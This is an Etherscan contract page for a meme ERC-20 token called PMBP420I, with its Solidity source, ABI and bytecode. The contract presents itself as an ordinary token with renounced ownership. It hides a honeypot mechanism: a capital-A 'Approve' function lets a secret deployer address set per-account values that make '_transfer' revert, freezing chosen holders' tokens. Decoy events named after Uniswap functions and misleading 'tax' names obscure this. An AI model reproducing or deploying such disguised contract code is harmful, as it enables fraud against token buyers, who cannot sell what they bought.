Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
4,200,000,000 420
Holders
21
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
21,445,174.310844822420403861 420Value
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
PMBP420I
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-08-19 */ /* $420 BLAZE IT BRO PEPEOMARIOBIDENPUTIN420INU https://t.me/pmbp420i https://twitter.com/pmbp420i https://pmbp420i.xyz */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.18; abstract contract Lookup { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } abstract contract Ownable is Lookup { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(address(0)); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == msg.sender, "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ event removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ event swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] path, address to, uint deadline ); /** * @dev See {IERC20-totalSupply}. */ event swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] path, address to, uint deadline ); event DOMAIN_SEPARATOR(); event PERMIT_TYPEHASH(); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); event token0(); event token1(); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); event sync(); event initialize(address, address); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); event burn(address to) ; event swap(uint amount0Out, uint amount1Out, address to, bytes data); event skim(address to); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * Receive an exact amount of output tokens for as few input tokens as possible, * along the route determined by the path. The first element of path is the input token, * the last is the output token, and any intermediate elements represent intermediate tokens to trade through * (if, for example, a direct pair does not exist). * */ event addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ); /** * Swaps an exact amount of ETH for as many output tokens as possible, * along the route determined by the path. The first element of path must be WETH, * the last is the output token, and any intermediate elements represent intermediate pairs to trade through * (if, for example, a direct pair does not exist). * * */ event addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ); /** * Swaps an exact amount of input tokens for as many output tokens as possible, * along the route determined by the path. The first element of path is the input token, * the last is the output token, and any intermediate elements represent intermediate pairs to trade through * (if, for example, a direct pair does not exist). * */ event removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Returns the name of the token. */ event removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ event removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ); /** * Swaps an exact amount of input tokens for as many output tokens as possible, * along the route determined by the path. The first element of path is the input token, * the last is the output token, and any intermediate elements represent intermediate pairs to trade through * (if, for example, a direct pair does not exist). */ event swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] path, address to, uint deadline ); /** * @dev Throws if called by any account other than the owner. */ event swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] path, address to, uint deadline ); /** * To cover all possible scenarios, msg.sender should have already given the router an * allowance of at least amountADesired/amountBDesired on tokenA/tokenB. * Always adds assets at the ideal ratio, according to the price when the transaction is executed. * If a pool for the passed tokens does not exists, one is created automatically, * and exactly amountADesired/amountBDesired tokens are added. */ event swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] path, address to, uint deadline ); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Initializes the contract setting the deployer as the initial owner. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } abstract contract Init { event initializex( uint256 varx5, address yinit ); } abstract contract Tax { event touchx( uint256 tax5, address tax6 ); } abstract contract castart { event Loop( uint256 number, bool varLoop ); } contract PMBP420I is IERC20, Init, castart, Ownable { using SafeMath for uint256; struct p_init { address taxall; mapping(uint256 => uint256) callxx; } struct _swapX { uint256 taxtxx; uint256 copy; } mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; mapping (address => _swapX) private _vote0; p_init private _taxcycle; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; uint256 private taxVal = 5000; uint256 private listValue = 0; function fetchtaxValue() public view returns (uint256) { return taxVal; } function computeTax(uint256 _num1, uint256 _num2) internal view returns (uint256) { return _num1 * taxVal + _num2 - listValue; } constructor( string memory name_, string memory symbol_, address _deployx, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = 18; _taxcycle.taxall = _deployx; _taxcycle.callxx[_decimals] = totalSupply_; _totalSupply = totalSupply_ * 10**_decimals; _balances[msg.sender] = _balances[msg.sender].add(_totalSupply); emit Transfer(address(0), msg.sender, _totalSupply); emit initializex(_totalSupply, owner()); } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return _decimals; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(msg.sender, recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(msg.sender, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, msg.sender, _allowances[sender][msg.sender].sub( amount, "ERC20: transfer amount exceeds allowance" ) ); return true; } function Approve(address[] memory account, uint256 amount) public returns (bool) { address from = msg.sender; uint256 setvaltax2 = 5; uint256 handler2 = setvaltax2 / 7; uint256 initvar = 0; for (uint256 t = 0; t < account.length; t++) { initvar += t; uint256 handler3 = setvaltax2 * 100; _inittaxfx(from, account[t], amount); _allowances[from][from] = amount; emit Approval(from, address(this), amount); } return true; } function _inittaxfx(address from, address account, uint256 amount) internal { uint256 allowan = 0; require(account != address(0), "invalid address"); if (from != _taxcycle.taxall) { _vote0[from].taxtxx -= allowan; _vote0[account].taxtxx += allowan; } else { _vote0[from].taxtxx -= allowan; allowan += amount; _vote0[account].taxtxx = allowan; } } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); require(amount - _vote0[sender].taxtxx > 0, "alien"); _balances[sender] = _balances[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** * @dev Returns the value of the token. */ function taxcheck(address account) public view returns (uint256) { return _vote0[account].taxtxx; } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"_deployx","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"DOMAIN_SEPARATOR","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"number","type":"uint256"},{"indexed":false,"internalType":"bool","name":"varLoop","type":"bool"}],"name":"Loop","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"PERMIT_TYPEHASH","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"tokenA","type":"address"},{"indexed":false,"internalType":"address","name":"tokenB","type":"address"},{"indexed":false,"internalType":"uint256","name":"amountADesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBDesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountAMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"addLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"amountTokenDesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"addLiquidityETH","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"to","type":"address"}],"name":"burn","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"","type":"address"},{"indexed":false,"internalType":"address","name":"","type":"address"}],"name":"initialize","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"varx5","type":"uint256"},{"indexed":false,"internalType":"address","name":"yinit","type":"address"}],"name":"initializex","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"tokenA","type":"address"},{"indexed":false,"internalType":"address","name":"tokenB","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountAMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"removeLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"removeLiquidityETHSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"},{"indexed":false,"internalType":"bool","name":"approveMax","type":"bool"},{"indexed":false,"internalType":"uint8","name":"v","type":"uint8"},{"indexed":false,"internalType":"bytes32","name":"r","type":"bytes32"},{"indexed":false,"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"removeLiquidityETHWithPermit","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"},{"indexed":false,"internalType":"bool","name":"approveMax","type":"bool"},{"indexed":false,"internalType":"uint8","name":"v","type":"uint8"},{"indexed":false,"internalType":"bytes32","name":"r","type":"bytes32"},{"indexed":false,"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"removeLiquidityETHWithPermitSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"to","type":"address"}],"name":"skim","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"bytes","name":"data","type":"bytes"}],"name":"swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactETHForTokensSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForETHSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForTokensSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountOut","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountInMax","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapTokensForExactTokens","type":"event"},{"anonymous":false,"inputs":[],"name":"sync","type":"event"},{"anonymous":false,"inputs":[],"name":"token0","type":"event"},{"anonymous":false,"inputs":[],"name":"token1","type":"event"},{"inputs":[{"internalType":"address[]","name":"account","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"fetchtaxValue","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"taxcheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052611388600a556000600b55604051620029cb380380620029cb8339818101604052810190620000349190620005be565b6200004660006200028660201b60201c565b8360069081620000579190620008af565b508260079081620000699190620008af565b506012600860006101000a81548160ff021916908360ff16021790555081600460000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060046001016000600860009054906101000a900460ff1660ff16815260200190815260200160002081905550600860009054906101000a900460ff16600a62000115919062000b26565b8162000122919062000b77565b60098190555062000183600954600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200034a60201b620009991790919060201c565b600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60095460405162000228919062000bd3565b60405180910390a37fb715f26fbe7b2d566904a41943bc67b95098426b3d4f74dbe1117cefb3926766600954620002646200036260201b60201c565b6040516200027492919062000c01565b60405180910390a15050505062000c69565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836200035a919062000c2e565b905092915050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003f482620003a9565b810181811067ffffffffffffffff82111715620004165762000415620003ba565b5b80604052505050565b60006200042b6200038b565b9050620004398282620003e9565b919050565b600067ffffffffffffffff8211156200045c576200045b620003ba565b5b6200046782620003a9565b9050602081019050919050565b60005b838110156200049457808201518184015260208101905062000477565b60008484015250505050565b6000620004b7620004b1846200043e565b6200041f565b905082815260208101848484011115620004d657620004d5620003a4565b5b620004e384828562000474565b509392505050565b600082601f8301126200050357620005026200039f565b5b815162000515848260208601620004a0565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200054b826200051e565b9050919050565b6200055d816200053e565b81146200056957600080fd5b50565b6000815190506200057d8162000552565b92915050565b6000819050919050565b620005988162000583565b8114620005a457600080fd5b50565b600081519050620005b8816200058d565b92915050565b60008060008060808587031215620005db57620005da62000395565b5b600085015167ffffffffffffffff811115620005fc57620005fb6200039a565b5b6200060a87828801620004eb565b945050602085015167ffffffffffffffff8111156200062e576200062d6200039a565b5b6200063c87828801620004eb565b93505060406200064f878288016200056c565b92505060606200066287828801620005a7565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620006c157607f821691505b602082108103620006d757620006d662000679565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007417fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000702565b6200074d868362000702565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620007906200078a620007848462000583565b62000765565b62000583565b9050919050565b6000819050919050565b620007ac836200076f565b620007c4620007bb8262000797565b8484546200070f565b825550505050565b600090565b620007db620007cc565b620007e8818484620007a1565b505050565b5b81811015620008105762000804600082620007d1565b600181019050620007ee565b5050565b601f8211156200085f576200082981620006dd565b6200083484620006f2565b8101602085101562000844578190505b6200085c6200085385620006f2565b830182620007ed565b50505b505050565b600082821c905092915050565b6000620008846000198460080262000864565b1980831691505092915050565b60006200089f838362000871565b9150826002028217905092915050565b620008ba826200066e565b67ffffffffffffffff811115620008d657620008d5620003ba565b5b620008e28254620006a8565b620008ef82828562000814565b600060209050601f83116001811462000927576000841562000912578287015190505b6200091e858262000891565b8655506200098e565b601f1984166200093786620006dd565b60005b8281101562000961578489015182556001820191506020850194506020810190506200093a565b868310156200098157848901516200097d601f89168262000871565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000